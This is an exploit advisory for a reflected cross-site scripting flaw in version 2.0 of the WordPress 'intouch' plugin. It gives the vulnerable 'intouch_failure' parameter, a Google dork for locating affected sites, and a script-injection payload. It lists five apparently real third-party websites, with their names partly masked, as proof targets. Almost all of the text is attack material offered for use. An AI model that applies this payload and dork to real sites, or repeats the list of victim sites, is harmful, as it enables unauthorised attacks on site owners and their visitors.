######################
# Exploit Title : Wordpress intouch Cross Site Scripting Vulnerability
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://wordpress.org/plugins/intouch/
# Google Dork : inurl:/wp-content/plugins/intouch/
# Date : 2013/01/01
# Tested on : Windows 8 , Linux
# Version : 2.0
# Software Link : http://downloads.wordpress.org/plugin/intouch.zip
######################
# Exploit : Cross Site Scripting
# Location :
http://[Target]/wp-content/plugins/intouch/intouch.js.php?intouch_failure=[XSS]
#
# Proof:
#
http://treXx4.net/esp/wp-content/plugins/intouch/intouch.js.php?intouch_failure="/><script>alert(1);</script>
#
#
http://www.maltXop.net/wp-content/plugins/intouch/intouch.js.php?intouch_failure="/><script>alert(1);</script>
#
#
http://www.sercoXl.com/wp-content/plugins/intouch/intouch.js.php?intouch_failure="/><script>alert(1);</script>
#
#
http://www.day-traXng-mind.com/wp-content/plugins/intouch/intouch.js.php?intouch_failure="/><script>alert(1);</script>
#
#
http://www.tauntonXasterrun.co.uk/wp-content/plugins/intouch/intouch.js.php?intouch_failure="/><script>alert(1);</script>
######################
# discovered by : Spoof
######################